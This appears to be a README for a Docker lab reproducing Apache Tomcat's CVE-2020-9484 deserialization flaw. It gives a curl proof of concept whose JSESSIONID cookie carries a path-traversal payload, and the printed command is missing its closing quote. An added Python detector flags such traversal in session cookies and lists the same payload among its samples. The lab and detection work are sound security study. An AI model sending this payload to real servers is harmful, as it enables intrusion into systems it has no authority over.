Apache Tomcat Deserialization Vulnerability (CVE-2020-9484)

Vulnerable target setup

  • Clone this repository
  • Run docker-compose up -d
  • That's it!

Exploit POC

  • Run curl -v 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/cfx

  • A file named coldfx is created in the tmp directory
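
Detection side of the request above, as an added example that is not part of this repository: a check that flags JSESSIONID values containing path traversal, including percent-encoded forms, in raw Cookie headers. The function names, the sample headers and the expected ID format (hex with an optional jvmRoute suffix, as a default Tomcat generates) are assumptions of this example.

```python
import re
from urllib.parse import unquote

# Assumption: Tomcat-default IDs (hex, optional ".jvmRoute" suffix).
EXPECTED_ID = re.compile(r"^[0-9A-Fa-f]{16,128}(\.[A-Za-z0-9_-]+)?$")
TRAVERSAL = re.compile(r"\.\.|[/\\]|\x00")


def session_ids(cookie_header, name="JSESSIONID"):
    """Yield every value sent for `name` in a raw Cookie header."""
    for part in cookie_header.split(";"):
        key, sep, value = part.strip().partition("=")
        if sep and key.strip() == name:
            yield value.strip().strip('"')


def fully_decoded(value, max_rounds=3):
    """Undo nested percent-encoding (e.g. %252e), at most max_rounds deep."""
    for _ in range(max_rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value


def classify(cookie_header):
    """Return 'traversal', 'malformed' or 'ok' for the worst ID in the header."""
    verdict = "ok"
    for raw in session_ids(cookie_header):
        value = fully_decoded(raw)
        if TRAVERSAL.search(value):
            return "traversal"
        if not EXPECTED_ID.match(value):
            verdict = "malformed"
    return verdict


# Constructed sample headers (not captured traffic).
SAMPLES = [
    "JSESSIONID=5F4DCC3B5AA765D61D8327DEB882CF99",
    "theme=dark; JSESSIONID=5F4DCC3B5AA765D61D8327DEB882CF99.node1",
    "JSESSIONID=../../../../../usr/local/tomcat/cfx",
    "JSESSIONID=%2e%2e%2f%2e%2e%2ftmp%2fx",
    "JSESSIONID=%252e%252e%255ctmp",
    "JSESSIONID=not-a-session-id",
]
if __name__ == "__main__":
    for header in SAMPLES:
        print(f"{classify(header):10} {header}")
```

The same test can run in a reverse proxy or servlet filter in front of Tomcat to reject the request before the session ID reaches the session store.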